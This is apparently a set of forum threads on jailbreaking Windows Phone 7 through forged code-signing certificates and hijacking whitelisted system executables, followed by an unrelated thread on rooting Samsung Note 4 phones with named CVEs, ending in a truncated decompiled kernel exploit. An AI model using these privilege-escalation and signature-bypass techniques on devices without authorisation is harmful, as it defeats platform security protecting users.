Related
[2012/06/03] IMPORTANT UPDATE HERE
Hi hackers,
This is meant as a little update on one of the projects I've been working on. I'm kinda stuck now. I have a suspicion of what the problem is. I thought that maybe if I write a post about it, me or someone else will have an idea on how to get this working.
The goal is to run native homebrew executables on WP7
This has not been done yet. All apps are Silverlight apps that are compiled as DLL and run by Taskhost.exe with least privileges. All other executables are signed by Microsoft. Executables that are compiled as ARM executable cannot be started.
The angle is to create a certificate that allows to sign a WP7 executable. Then add that to the appropriate certificate store. Create an executable. Sign it with the private key. Load it onto a WP7 device. Copy it to the Windows folder. Use an OEM driver to launch the executable.
First I did research on the certificate stores. I can now with certainty state that there are 4 certificate stores:
- CA
- Root
- My
- Code Integrity
After a lot of research I finally got complete read/write access to all of these stores. The Code Integrity store contains all the certificates that are used by the Loader Verifier to verify the executable that is being launched. When the device is launched for the first time, the certificates that are in \Windows\ciroots.p7b are installed to that certificate store. These certificates have these properties:
Key Usage = 0x86 = Digital Signature, Certificate Signing, Off-line CRL Signing, CRL Signing
Entended Key Usage = Code Signing (1.3.6.1.5.5.7.3.3) + Unknown key usage (1.3.6.1.4.1.311.10.3.14)
So I used OpenSSL to create such an certificate (with private key) for myself. And I installed the certificate in the Code Integrity store.
I then used VS2008 to create a completely barebone executable (ARMv4 Console app with only Sleep(-1) in the Main). I signed it with SignTool from Microsoft.
I loaded the executable to my device and I copied it to the \Windows folder (I think the policies restrict executing to only from that folder, but I'm not sure about that).
I use the Samsung driver to launch the executable, because I need at least Standard Rights to launch an executable. The Samsung driver has Elevated Rights. My own app has only Least Privileges. Using the Samsung driver does not return any success or fail codes. But looking at the Running Processes list, I don't see my Test.exe running. It should be, because the main thread is put to sleep infinitely.
So why is this not working?
Well, I have a guess. I think it's the policies that bind the certificates in the Code Integrity store to the different accounts/chambers. In the \Windows folder there are a lot of policy xml-files. On fist boot, these are merged into PolicyCommit.xml and then compiled to policydb.vol. When the Loader Verifier (lvmod.dll) loads an executable, it queries the policies to determine access rights and chamber for that executable. The policies that matter in this context are defined in 8314B832-8D03-444f-9A2A-1EF6FADCC3B8.policy.xml. It's an xml-file that basically says this:
Code:
Microsoft Mobile Device Privileged PCA - ced778d7bb4cb41d26c40328cc9c0397926b4eea - not used in this context
Microsoft Mobile Device TCB PCA - 88bcaec267ef8b366c6e6215ac4028e7a1be2deb - honored by System Identity Group
Microsoft Mobile Device Unprivileged PCA - 1c8229f5c8d6e256bdcb427cc5521ec2f8ff011a - honored by Standard Right Identity Group
Microsoft Mobile Device VSD PCA - 91b318116f8897d2860733fdf757b93345373574 - not used in this context
VeriSign Mobile Root Authority for Microsoft - 069dbcca9590d1b5ed7c73de65795348e58d4ae3 - honored by LPC Identity Group
I should find a way to add a policy with my certificate in it. Any ideas?
Ciao,
Heathcliff74
If you are able to re-sign an executable that is already in the ROM, i would try that, so you know the problem isn't within the native code, but only with the signing. Or maybe the other way round which would be awesome.
regards
Flow WP7 said:
If you are able to re-sign an executable that is already in the ROM, i would try that, so you know the problem isn't within the native code, but only with the signing. Or maybe the other way round which would be awesome.
regards
Click to expand...
Click to collapse
That's a good idea. I must say that I don't have much faith in the current RecMod tools for WP7 right now. I am able to get the binaries recmodded so that I can disassemble them correctly. But I don't think they can be easily launched. But there are executables that are on the rom as complete binaries, instead of rom-modules. To begin with, I have to select one that does not need much privileges to run and try to sign that one and then run it.
I'm really busy with work right now, so I think I won't be able to try it until the day after tomorrow. But I will try it and will let know how that went.
Thanks!
Decompiled taskhost.exe, so it gets more easy for us to see if its able to make taskhost to start another exe for us. Lots of code tho (C code).
taskhost.c (276 KB) in attachments.
edit: Oh, WOW, this really shows how to call those anonymous methods without call signature "Hello" (signature: "??z_Hello_?mze")
Hmm, pretty much about the pause part?
Code:
if ( v10 )
{
a7 = sub_178E7(v10);
if ( a7 >= 0 )
{
a7 = sub_180A5(v7, v7 + 64);
if ( a7 >= 0 )
{
a7 = ThemeInitialize(v7 + 136);
if ( a7 >= 0 )
{
v11 = sub_1862B(v13, v7);
EnableHostAutoDehydration(v11 == 3);
v16 = 0;
a7 = InitializeEmClientEx(&a2, 0, &v16);
if ( a7 >= 0 )
{
a7 = RegisterPausedHostCallback(sub_19D0D, 0);
if ( a7 >= 0 )
{
a7 = RegisterResumingHostCallback(sub_19D31, 0);
if ( a7 >= 0 )
{
if ( v11 != 3
|| (a7 = RegisterDehydrateHostCallback(sub_19D76, 0), a7 >= 0)
&& (a7 = RegisterFreezeHostCallback(sub_19D97, 0), a7 >= 0) )
{
a7 = RegisterExitHostCallback(sub_19D55, 0);
if ( a7 >= 0 )
a7 = sub_17C0A(*(_DWORD *)(v7 + 128), 0);
}
}
}
}
}
}
}
}
UIX framework entry-point (exe)
Code:
int __cdecl sub_11114(int a1, int a2, int a3)
{
int v4; // [sp+0h] [bp-38h]@1
char Dst; // [sp+4h] [bp-34h]@1
int v6; // [sp+8h] [bp-30h]@1
int v7; // [sp+Ch] [bp-2Ch]@1
int v8; // [sp+18h] [bp-20h]@1
int v9; // [sp+28h] [bp-10h]@1
v4 = 0;
memset(&Dst, 0, 0x34u);
v8 = a3;
v6 = (int)L"res://FlightModeUXDLL!FlightMode.uix";
v7 = (int)L"FMMain";
v9 = 2;
RunApplication(&v4);
return dword_12034;
}
C++ converted
Code:
UIXApplicationInfo app;
app { ... }
RunApplication(&app);
struct UIXApplicationInfo
{
int UNK_v4 = 0;
char Dst = {0};
char* uixFile;
char* uixEntryPoint;
int UNK_v8;
int UNK_v9 = 2;
}
Then just figure out the UIX part (or test the existing "res://FlightModeUXDLL!FlightMode.uix" if it launches, if so, we made it).
___
Found this in mango dump:
> Uninstall provxml
Code:
<!-- Uninstall Xbox LIVE Extras App -->
<characteristic type="AppInstall">
<nocharacteristic type="{0c17d153-b5d5-df11-a844-00237de2db9e}"/>
</characteristic>
Is there a reason you can't just use COM interop to run native code? Check out this thread for a discussion covering the technique: http://forum.xda-developers.com/showthread.php?t=820455
athompson said:
Is there a reason you can't just use COM interop to run native code? Check out this thread for a discussion covering the technique: http://forum.xda-developers.com/showthread.php?t=820455
Click to expand...
Click to collapse
Hello "co-founder of native code on WP7"
I'm fully aware of the possibility of native code through COM. I use it for example in the WP7 Root Tools. But I just wanted to take it a step further. Running native executables give a lot more freedom. Not being bound to the watchdog, getting higher privileges and running in the background for instance. But there's a whole lot more. So that's why I started research on it. Thanks anyway. You helped making native code possible on WP7.
Ciao,
Heathcliff74
The taskhost.exe is our RAM, because our app run in it, giving us full RAM access inside our "viritual ram". So that means we own all strings, int, floats etc. Then rewrite the ram to change strings in mscorlib. The checksum if an exe has been modified is only checked at startup, without checking if we modify the dll at runtime.
My purpose with this is that some function's call external apps, where we rewrite the args going in to the function. Just find an exploitable function and modify it after JIT has been there one before generating the pre ram, that we modify and call yet again but with the modified ram values behind.
Marshal.Copy, my friends, there.
[SecurityFuckingSafeCritical]
(byte[] source, IntPtr destination, int length)
> Interopservices leaked dll (\windows)
destination = our ram ptr to modify.
fiinix said:
The taskhost.exe is our RAM, because our app run in it, giving us full RAM access inside our "viritual ram". So that means we own all strings, int, floats etc. Then rewrite the ram to change strings in mscorlib. The checksum if an exe has been modified is only checked at startup, without checking if we modify the dll at runtime.
My purpose with this is that some function's call external apps, where we rewrite the args going in to the function. Just find an exploitable function and modify it after JIT has been there one before generating the pre ram, that we modify and call yet again but with the modified ram values behind.
Marshal.Copy, my friends, there.
[SecurityFuckingSafeCritical]
(byte[] source, IntPtr destination, int length)
> Interopservices leaked dll (\windows)
destination = our ram ptr to modify.
Click to expand...
Click to collapse
Hmmm. 10 Points for inventiveness But I don't think it's going to work. Even if you could find a function where the executable is passed as argument you still don't have enough privileges. Most code will have the path to the executable hardcoded instead of an argument. And you will still run under TaskHost with Least Privileges. And you need to have at least Standard Privileges or higher to launch most executables with CreateProcess() or ShellExecuteEx().
Sent from my OMNIA7 using XDA Windows Phone 7 App
Heathcliff74 said:
Hmmm. 10 Points for inventiveness But I don't think it's going to work. Even if you could find a function where the executable is passed as argument you still don't have enough privileges. Most code will have the path to the executable hardcoded instead of an argument. And you will still run under TaskHost with Least Privileges. And you need to have at least Standard Privileges or higher to launch most executables with CreateProcess() or ShellExecuteEx().
Sent from my OMNIA7 using XDA Windows Phone 7 App
Click to expand...
Click to collapse
"And you will still run under TaskHost with Least Privileges"
I know, i dont need standard rights to do it. Because i call a mscorlib function that is trusted code. I think you saw my idea wrong, let me show you.
[mscorlib, SecuritySafeCritical]
public static void example(string str)
{
string mscorlibStr = "you cant change my value ";
Debug.WriteLine(mscorlibStr + str);
}
This is where we modify "mscorlibStr" in ram and the function is still trusted code. But its doing something totally different from that it would do.
fiinix said:
"And you will still run under TaskHost with Least Privileges"
I know, i dont need standard rights to do it. Because i call a mscorlib function that is trusted code. I think you saw my idea wrong, let me show you.
[mscorlib, SecuritySafeCritical]
public static void example(string str)
{
string mscorlibStr = "you cant change my value ";
Debug.WriteLine(mscorlibStr + str);
}
This is where we modify "mscorlibStr" in ram and the function is still trusted code. But its doing something totally different from that it would do.
Click to expand...
Click to collapse
I really hate to break it for you. But the [SecuritySafeCritical] is indeed trusted code, but it will still check your privileges. All the API functions that do system modifications like that, do the security checks. Read the note under SecuritySafeCriticalAttribute here. Also read this; same problem. You are in process TaskHost.exe and it is launched in LPC (Least Privilege Chamber), so every CeImpersonateToken() to do the important stuff will fail and return an error code. I also wouldn't know how you would modify the stack-frame of a function that you call. Seems impossible to me, because at the moment you call the function, that stack-frame has not been allocated yet.
Anyway, although I don't think that is going to work in any way, I absolutely don't want to discourage you, because my experience is that when you try enough, sooner or later you will find an exploit
Ciao,
Heathcliff74
Currently installing "Windows Embeded Compact 7", because this lousy ARMv4 compiler (from WM5-6) maybe generates wrong ARM op-codes (WP7 runs ARMv7), therefore it says "Invalid program signature" (or what error it was).
Maybe ARMv7 is'nt even backwards compatibility with ARMv4.
By compiling with the ARMv7 compiler from WEM7, it will probably (hope) generate a valid exe.
Thats it..
edit:
*Research
"Armv7 is the processor instruction set used starting with the S5L8920 in the iPhone 3GS and in all subsequent devices. Processors that support Armv7 instructions are backward compatible with Armv6 instructions, but attempting to run binaries compiled for Arm7 on older, Armv6 processors will result in the error: "Bad CPU type in executable"."
Source: http://theiphonewiki.com/wiki/index.php?title=Armv7
___
"As I said in the past, the ARMv6 CTR was kept backwards compatible with
> > > earlier versions of the ARM architecture (and ARM tried to keep it like
> > > this as much as possible). With ARMv7, you have multiple levels of cache
> > > and different types (e.g. ASID-tagged VIVT I-cache). There is no way you
> > > could encode the useful information while keeping the same (and only)
> > > register, hence the the need for a new register."
Source: http://www.spinics.net/lists/arm-kernel/msg58813.html
As i see this (^), all ARMv > 6 == no backwards
ARMv6 had backwards to 4
ARMv7 >> ARMv6 compatibility, not more.
_
Problem officer even running ARMv4???
>On a non ARMv4 backwards compatibility CPU.
Profit!!
__
[ExeX.exe] (the one that i recompiled to a state: "this has to work")(ARMv4)
Decompilation:
Code:
; Attributes: bp-based frame
EXPORT start
start
var_20= -0x20
oldR4= -0x1C
oldR5= -0x18
oldR6= -0x14
oldR7= -0x10
oldR11= -0xC
oldSP= -8
oldLR= -4
MOV R12, SP
STMFD SP!, {R4-R7,R11,R12,LR}
ADD R11, SP, #0x1C
SUB SP, SP, #4
MOV R4, R3
MOV R5, R2
MOV R6, R1
MOV R7, R0
.
Next up, decompile a ARMv7 from a raw device. (how, someone has one)
fiinix said:
Next up, decompile a ARMv7 from a raw device. (how, someone has one)
Click to expand...
Click to collapse
I think you'll find what you're looking for here: http://forum.xda-developers.com/showthread.php?t=681659 in the dump of the IMAGEFS. What did you use to decompile it? IDA Pro, or a different thing?
athompson said:
I think you'll find what you're looking for here: http://forum.xda-developers.com/showthread.php?t=681659 in the dump of the IMAGEFS. What did you use to decompile it? IDA Pro, or a different thing?
Click to expand...
Click to collapse
IDA Pro, yes. Ill see if i can dump that "nbh" (used to nb0), and extract a fully operable exe that is not corrupted.
fiinix said:
IDA Pro, yes. Ill see if i can dump that "nbh" (used to nb0), and extract a fully operable exe that is not corrupted.
Click to expand...
Click to collapse
First use Andim's WP7 Rom Tools to extract the rommodules. Remember to always dump a folder, not a single file.
Then use Denomitor's version of Recmod and follow the instructions in the post. That works most of the time.
Going forward
Currently building the WP7 ARMv7 commandline, getting closer.
Current cmd (not working, no need to help):
Code:
"C:\WINCE700\sdk\bin\i386\arm\cl.exe" /Od /D "_DEBUG" /D "_WIN32_WCE=0x700" /D "UNDER_CE" /D "ZUNE_HD" /D "WINCE" /D "DEBUG" /D "_WINDOWS" /D "ARM" /D "_ARM_" /D "_UNICODE" /D "UNICODE" /D "_CRT_SECURE_NO_WARNINGS" /Gm /EHsc /MTd /Gy /fp:fast /GR- /Fo"C:\Users\Steven VM\Desktop\ARMv7\Build\Debug/" /Fd"C:\Users\Steven VM\Desktop\ARMv7\Build\Debug/vc80.pdb" /W3 /c /Zi /TP /QRfpe- /QRarch7 "C:\Users\Steven VM\Desktop\ARMv7\main.cpp"
/QRarch7 is the ARMv7.
edit:
HOORRY SHEEAT
generated:
> main.obj
> vc80.idb
> vc80.pdb
, feels soo good:
main.exe is there.
IDA Pro says "ARM AND THUMB MODE SWITCH INSTRUCTIONS", just like others.
Code:
; Input MD5 : B50E8D8395DE7CA2419464DC3CE0BC74
; File Name : C:\Users\Steven\Desktop\burn\main.exe
; Format : Portable executable for ARMI (PE)
; Imagebase : 10000
; Section 1. (virtual address 00001000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
; Processor : ARM
; Target assembler: Generic assembler for ARM
; Byte sex : Little endian
; Segment type: Pure code
AREA .text, CODE, READWRITE, ALIGN=4
; ORG 0x11000
CODE32
EXPORT start
start
var_4= -4
SUB SP, SP, #4
MOV R3, #1
STR R3, [SP,#4+var_4]
LDR R0, [SP,#4+var_4]
ADD SP, SP, #4
BX LR
; End of function start
Made an empty entry point as from above ^:
Code:
int wWinMainCRTStartup()
{
return 1;
}
PE Explorer (main.exe):
Machine: THUMB
Operating System Version: 7.0
Image Version: 7.0
Subsystem Version: 7.0
Subsystem: WinCE GUI
**** so CLOSE!
Successful copied "main.exe" and "ExeX.exe" to "\Windows", where i have the right to launch them remotely.
Method:
WP7Process p = device.LaunchEXE(@"main.exe", "");
main.exe (no signing, ARMv7):
System.UnauthorizedAccessException: Access is denied.
WP7Process p = device.LaunchEXE(@"ExeX.exe", "");
ExeX.exe (signed with CA/ROOT custom, ARMv4):
System.Runtime.InteropServices.COMException (0x800704EC): This program is blocked by group policy. For more information, contact your system administrator.
There IS different things going on! Something is missing, but what
edit:
Signed main.exe with custom XDA ROOT certificate (ARMv7):
signtool.exe sign /sha1 "[CertChomp]" "main.exe"
> Now main.exe also gets "This program is blocked by group policy. For more information, contact your system administrator."
Ill see if i can add it to startup list , if it boot from there.
edit 2:
Nope gonna hijack "fieldtestapp.exe" with my app because policy says:
Risky-mode.Activate();
Backup(fieldtestapp.exe, backupPath);
Copy(main.exe, > fieldtestapp.exe);
"LOADERVERIFIER_ROUTE_BY_NAME"
"LOADERVERIFIER_EXE_AUTHZ_INROM_ROOT"
<Rule Description="Route fieldtestapp.exe" ResourceIri="$(LOADERVERIFIER_ROUTE_BY_NAME)/PRIMARY/WINDOWS/FIELDTESTAPP.EXE" SpeakerAccountId="$(SYSTEM_USER_NAME)" PriorityCategoryId="PRIORITY_LOW">
<Authorize>
<Match AccountId="$(FIELDTESTAPP_EXE_SID)" AuthorizationIds="LV_ACCESS_EXECUTE" />
</Authorize>
</Rule>
<Rule Description="Authorize fieldtestapp.exe be loadable to $(FIELDTESTAPP_EXE_SID) and chambers" ResourceIri="$(LOADERVERIFIER_EXE_AUTHZ_INROM_ROOT)/WINDOWS/FIELDTESTAPP.EXE" SpeakerAccountId="$(SYSTEM_USER_NAME)" PriorityCategoryId="PRIORITY_STANDARD">
<Authorize>
<Match AccountId="$(FIELDTESTAPP_EXE_SID)" AuthorizationIds="LV_ACCESS_EXECUTE,LV_ACCESS_LOAD" />
</Authorize>
</Rule>
edit 3:
Seems like "fieldtestapp.exe" is ROM locked. Need to try out some other targets.
edit 4:
Target acquired "ProximitySensorDisable.exe" > "ProximitySensorDisableBackup.exe"
Successful copy == no ROM lock.
edit 5:
There exists two types of talking to the LoadVerifier (the: This program is blocked by group policy.):
Direct exe name OR special certificate
How we do:
> Direct exe (hijack exe)
How we cant do (SHA1) (Nope, ain't gonna happen):
> We certainly dont have Microsofts certificate so this way is a nodo, haha lol, no do way.
(1: direct exe name) /LOADERVERIFIER/GLOBAL/AUTHORIZATION/PE_AUTHZ/NONE/NONE/PRIMARY/WINDOWS/CFGHOST.EXE
(2: static/pre certificates) /LOADERVERIFIER/GLOBAL/CERTIFICATES/HASH/SHA1/91B318116F8897D2860733FDF757B93345373574
edit 6:
Yep, loads of edits, just for you.
Allowed exe's to run (sorted a-z) (direct exe) (pre cert removed):
Code:
ACCESSIBILITYCPL.EXE
ACCOUNTSMANAGER.EXE
ALARMS.EXE
APPCHECKERSHIM.EXE
APPPREINSTALLER.EXE
AUTODATACONFIG.EXE
AUTOSIM.EXE
AUTOTIMEUPDATE.EXE
BRIGHTNESSCPL.EXE
BTUXCPL.EXE
CALENDARAPP.EXE
CALLSETTINGSHOST.EXE
CALNOT.EXE
CALUPD.EXE
CAM_FW_UPDATE_UI.EXE
CELLUXCPL.EXE
CERTINSTALLER.EXE
CFGHOST.EXE
CFLAUNCHER.EXE
CHDIALERHOST.EXE
CIPHASE2.EXE
CLIENTSHUTDOWN3.EXE
CLOCKNOT.EXE
CMACCEPT3.EXE
COLDINIT.EXE
COMMSVC.EXE
COMPOSITOR.EXE
CONFIGDM.EXE
CONFIGXML.EXE
CONMANCLIENT3.EXE
CONTACTS.EXE
CPROG.EXE
DATETIMECPL.EXE
DCVSSWITCH.EXE
DEPOTCOPY.EXE
DEVICEFEEDBACKCPL.EXE
DEVICEREG.EXE
DIAGPORTCHANGETEST.EXE
DLLHOST.EXE
DMSCHEDULERCALLBACK.EXE
DMSRV.EXE
DMSTOOLS.EXE
DUACLIENT.EXE
DW.EXE
EDM3.EXE
EMAIL.EXE
EMAILSETUP.EXE
ENDPOINT.EXE
FCROUTERCMDTEST.EXE
FIELDTESTAPP.EXE
FLIGHTMODE.EXE
GAMESUX.EXE
IEXPLORE.EXE
INITIATEDMSESSION.EXE
INVALIDLICENSEUXLAUNCHER.EXE
KEYBOARDCPL.EXE
LASSCREDENTIALEXPIRATIONCHECK.EXE
LASSRESTARTER.EXE
LIVETOKEN.EXE
LOCKCPL.EXE
LOOPBACKTEST.EXE
MEDIAGROVEL.EXE
MEUX.EXE
MITSMAN.EXE
MMSPRPROXY.EXE
MMSTRANSHOST.EXE
MULTIMEDIALAUNCHER.EXE
MYPHONECPL.EXE
MYPHONETASKSRUNTIME.EXE
NATIVEINSTALLERHOST.EXE
OFFICEURL.EXE
OMADMCLIENT.EXE
OMADMPRC.EXE
OMHUB.EXE
ONBOOTSQM.EXE
ONENOTEMOBILE.EXE
OOBE.EXE
PACMANINSTALLER.EXE
PHOTOENT.EXE
PHOTOENTCAPTURE.EXE
PHOTOUPLOADER.EXE
PPT.EXE
PWORD.EXE
PWRLOGCTRL.EXE
PXL.EXE
RAPICONFIG.EXE
REGIONCPL.EXE
RMACTIVATE.EXE
SAPISVR.EXE
SECSIMTKIT.EXE
SERVICESD.EXE
SERVICESSTART.EXE
SETTELEPORTMODE.EXE
SETTINGS3.EXE
SHORTMSG.EXE
SICLNT.EXE
SIGNALEVENT.EXE
SIREPSERVERAPPDEV.EXE
SMSETTINGS.EXE
SMSTRANSPORT.EXE
SOUNDCPL.EXE
SPEECHCPL.EXE
SPMC.EXE
SQMEVENT.EXE
SSUPDATE.EXE
TASKHOST.EXE
TELSHELL.EXE
TESTSHOW.EXE
THEMECPL.EXE
TOGGLEBROWSERHIBERNATION.EXE
TOGGLEDOG.EXE
UDEVICE.EXE
UIF.EXE
UNIFIEDPAIR.EXE
USBMGR.EXE
WEBSEARCH.EXE
WIFIUXSPLASH.EXE
WLANEXT.EXE
WLIDSETUP.EXE
WWANDATAMGR.EXE
XDRMREMOTESERV.EXE
ZIPVIEW.EXE
ZMFTASKLAUNCH.EXE
How code (yes i know its super un-optimized, fast put together):
Code:
var doc = XDocument.Load(File.OpenRead("SamsungOmnia7_BasePolicy_webserver.xml"));
var ea = doc.Elements().ToArray()[0].Elements()
.Where(x => x.Name.LocalName == "Rule")
.Where(x => x.Attributes("ResourceIri").Count() > 0)
.Where(x =>
{
var r = x.Attribute("ResourceIri").Value;
return r.Contains("LOADERVERIFIER") && r.ToLower().Contains(".exe") && !r.Contains("CERTIFICATES");
})
.Select(x =>
{
var v = x.Attribute("ResourceIri").Value;
var l = v.LastIndexOf('/');
return v.Substring(l + 1);
})
.Distinct()
.OrderBy(x => x)
.ToArray();
edit 7:
yeah, lol i say too.
Unprotected exe (FCRouterCmdTest.exe)
> c:\Project Work\SGH-i707(Cetus)\FCRouterCmdTest\Windows Mobile 6 Professional SDK (ARMV4I)\Release\FCRouterCmdTest.pdb
mfw samsung use "Windows Mobile 6 Professional SDK (ARMV4I)"
Wow, this truly was a big step today
Done hacking today.
"After a day, there comes another day"
@fiinix,
You did a lot of testing. Good job, man.
A few comments:
0x800704ec "blocked by group policy" is THE error of the new WP7 security model. It is basically telling you to go f*ck yourself. Everything you do without enough privileges or capabilities results in this error.
The two ways of policies, exe-path and cert-hash, is result of difference between rom-modules and executables that are signed and added as a file. Rom-modules are not even normal files. You can't open and read them. They are executable sections that are mapped in rom-address-space. You can only call loadlibrary() and createprocess() on them. Since they are only executable sections, they don't have a signature, like a normal executable file would have. Therefore they are referred to with an exe-path. You may safely assume that every path to an executable in the policy files is referring to a rom-module and can't be overwritten in any way (except by cooking your own rom - who is going to unlock our bootloaders?!?) Other than that, there are a few signing certs that Microsoft has. Signing the different executables with different privileges and accordingly a different cert. Their hashes are in the policies.
Using ARMv7 isn't going to add much I'm afraid. Although it may make a difference in the exe-header. But you've seen tools that were really old, remember And they were signed to have TCB access. And they were compiled for ARMv4. So it should not make much difference.
I did some testing with certificates myself yesterday. Up until Zune totally went bezerk on it. I don't know what happened, but after removing my own cooked certs it all seems normal again. Zune started using 100% cpu on verifying certs and dropping my connection all the time. Help! So I haven't made much progress. I will try again later. Hope it will go better. And I will try to resign an existing executable, as Flow WP7 suggested.
According to policy on my omnia (webserver dumped) there seems to exist two typed of HDD, one ROM hard coded and one that points to internal sd card. It seems that all exe and dll on the sd are not "protected" and therefore can be hijacked.
Seems like ARMv4 will be enough, but to be on the safe side i compile with both, to have more chance getting it work.
Zune, hmm, did not seem to like you, maybe Microsoft DDOS'ed you lol
"Sent from my fingers on my phone", don't expect way too long text
XxXPachaXxX said:
Excuse my ignorance...I'm a noob...This hack may also work on LG devices?
Click to expand...
Click to collapse
At the moment fiinix and I are both working on Samsungs and we use a couple of Samsung-specific exploit to get deeper in the system and getting a better understanding of the system. The ultimate goal is to find exploits that will work for all devices. But we're not at that stage yet. Hacking is research, a lot of trying and being lucky sometimes. Just bear with us
Ciao,
Heathcliff74
WelcomeFirst I have to ask that everyone please follow the rules when posting in here.The last thread was shut down due to people getting off topic so let's stay on track here, if you have a question that you'd like to ask and are unsure if it belongs here then simply PM me and I'll help. In order to get things going I've added a simple FAQ below for people who may not be up to speed.
Q: What's needed to root the N910A/N910V?
A: A kernel exploit and an Android OS exploit.
Q: What's the current status?
A: We have a kernel exploit that will work for us and the method to implement it. Our next goal is to apply an Android exploit which will grant us System UID in order to apply our kernel exploit and write root.
Q: What exploit are we using for the kernel side?
A. The exploit will be the work of @zxz0O0 and is based off of CVE-2014-4322. This is confirmed NOT patched by Samsung.
Q: What exploit are we using for Android side?
A. Current target is CVE-2015-1474. We've explored a previous exploit which has proven to work for the Sony Z3 (CVE-2014-7911), but unfortunately Samsung fixed this prior to releasing our devices.
Current Focus - Creating an APK that will exploit CVE-2015-1474 to elevate us to System UID. This is where we are at this current time. We will need a crafty Dev to come up with such APK. I am a novice when it comes to scripting and exploiting but in my free time I've been soaking up as much information as I possibly can to help in the future.
.
Working on PoC here:
https://github.com/p1gl3t/CVE-2015-1474_poc
Other Threads working on 2015-1474
http://forum.xda-developers.com/kin...luating-cve-2015-1474-to-escalate-to-t3045163
android-DEP said:
@ZPaul2Fresh8 confirmed that CVE-2014-4322 (qseecom) is fixed in N910AUCU1BNK3 but it might not be in N910AUCU1ANIE.
Click to expand...
Click to collapse
To clarify, CVE-2014-4322 is NOT patched in ANY baseband version on our devices. CVE-2014-7911 is the patched.
munjeni said:
Its not obfuscated if you think about file called "main"! It is 7z archive but removed first 2 bytes "7z" or hex "377A", just simple open "main" file with hex editor and append 2 bytes 37 7A to the start of the file and save them! It is password protected 7z archive and you must research for password in asembly if you think to open them with 7z I stil have no idea what is purpose of these "main" file (malware?) when there is another one "main" file (tar.gz) which is extracted when you execute file "a", but I know thats a two diferent "main" files!
Click to expand...
Click to collapse
From @idler1984 , here's the explanation of the 'a' and 'main' files. HERE.
jorgasm209 said:
Not sure how to prove something that isn't there... hard to prove a negative. APK is claiming not vulnerable even with the apparent absence of checkAndGetTcObjectClass in the firmware. Someone much smarter than me can attempt to find out why My bet is on @android-DEP ... see post above regarding ServiceExploitActivity.java.
Click to expand...
Click to collapse
It's been confirmed by me that exploit CVE-2014-7911 has been patched in the latest OTA (NK3 on AT&T) and I believe @zxz0O0 confirmed it on the earlier baseband too. If you're in doubt and you're running the earlier build, just go to system/framework/core.odex and you'll find the function is located there...
Now if you're just skimming through here let me catch everyone up to speed here;
At this point in order to achieve root for our devices we will need a combination of exploits. There are a ton of CVE's being thrown and I can see why people are getting confused so I'll try to make it easier to understand. I'll break it down by CVE #.
CVE-2014-7911 - Patched so it doesn't matter. Android OS exploit to gain System UID. Not Root
CVE-2014-8609 - Android OS exploit. Possibly our next venture for gaining System UID, I've been told otherwise. Another vulnerability exists that may be easier. CVE-2015-1474
CVE-2014-4322 - Kernel exploit. Un-patched. Used to get Root while in System status.
So we need an exploit to get us System status and from there we pretty much have CVE-2014-4322 exploit to get Root from there.
Now, you may have read about Root solutions such as geifroot & 2014-79xx but forget about them because they are all based on Team Keen's exploit of CVE-2014-7911 which we confirmed has been backported and patched from day 1 on our devices. So in order to proceed we need a new exploit to get System status first... that vulnerability may be 2015-1474....
ZPaul2Fresh8, thanks for this write up. Finally someone who has understood the situation. I'm not really experienced in Java but I believe CVE-2014-8609 will not be useful. This exploit is for broadcasting actions to apps (e.g. dialing), not executing shell commands or binaries.
zxz0O0 said:
ZPaul2Fresh8, thanks for this write up. Finally someone who has understood the situation. I'm not really experienced in Java but I believe CVE-2014-8609 will not be useful. This exploit is for broadcasting actions to apps (e.g. dialing), not executing shell commands or binaries.
Click to expand...
Click to collapse
I understand, but what are the possible Broadcasts at our disposal? Whatever broadcast we send will be of System UID so maybe we can find something if we look hard enough?
I have Liang Chen (Team Keen (http://en.wikipedia.org/wiki/Pwn2Own#Contest_2014)) looking into CVE-2014-8609 to see if we can achieve System UID.
munjeni said:
Guys, CVE-2014-4322 root exploit from retme7 is not working, it need a lot of modifications, I am working on this 3 days and I am on 90 percent of luck, I am now stuck with this -> http://forum.xda-developers.com/showpost.php?p=58460530&postcount=1171
If you have idea for how I can change app_id than I will get it working and will share source with you!
This is decompiled source from guy who have it working and don't want to share them:
Code:
void sub_89F4(void) {
;
}
int __fastcall sub_8A78(signed int a1, int a2)
{
signed int v2; // [email protected]
FILE *v3; // [email protected]
void *v4; // [email protected]
signed int v5; // [email protected]
FILE *v6; // [email protected]
int v7; // [email protected]
char v8; // [email protected]
const char *v9; // [email protected]
_UNKNOWN *v10; // [email protected]
_UNKNOWN *v11; // [email protected]
char **v12; // [email protected]
const char *v13; // [email protected]
int result; // [email protected]
int ion_fd; // [email protected]
int v16; // [email protected]
int v17; // [email protected]
int *v18; // [email protected]
char *v19; // [email protected]
int v20; // [email protected]
int qseecom_fd; // [email protected]
int v22; // [email protected]
int v23; // [email protected]
int v24; // [email protected]
int *v25; // [email protected]
char *v26; // [email protected]
int *v27; // [email protected]
int v28; // [email protected]
int v29; // [email protected]
int v30; // [email protected]
int v31; // [email protected]
int v32; // [email protected]
int v33; // [email protected]
int v34; // [email protected]
int v35; // [email protected]
int *v36; // [email protected]
int v37; // [email protected]
int v38; // [email protected]
int v39; // [email protected]
int v40; // [email protected]
int *v41; // [email protected]
int v42; // [email protected]
int v43; // [email protected]
void *v44; // [email protected]7
int v45; // [email protected]
int v46; // [email protected]
unsigned int v47; // [email protected]
int v48; // [email protected]
int v49; // [email protected]
int v50; // [email protected]
int *v51; // [email protected]
int ptmx_fd; // [email protected]
int v53; // [email protected]
int v54; // [email protected]
int v55; // [email protected]
int v56; // [email protected]
int *v57; // [email protected]
char *v58; // [email protected]
int v59; // [sp+Ch] [bp-1F4h]@1
int memfile_fd; // [sp+Ch] [bp-1F4h]@26
void *ion_void; // [sp+14h] [bp-1ECh]@26
int v62; // [sp+18h] [bp-1E8h]@24
int v63; // [sp+1Ch] [bp-1E4h]@38
int v64; // [sp+20h] [bp-1E0h]@38
int v65; // [sp+24h] [bp-1DCh]@38
int v66; // [sp+28h] [bp-1D8h]@38
int v67; // [sp+2Ch] [bp-1D4h]@22
int v68; // [sp+30h] [bp-1D0h]@22
int v69; // [sp+34h] [bp-1CCh]@22
int v70; // [sp+38h] [bp-1C8h]@22
int v71; // [sp+3Ch] [bp-1C4h]@24
unsigned int v72; // [sp+40h] [bp-1C0h]@41
int v73; // [sp+44h] [bp-1BCh]@41
int v74; // [sp+48h] [bp-1B8h]@41
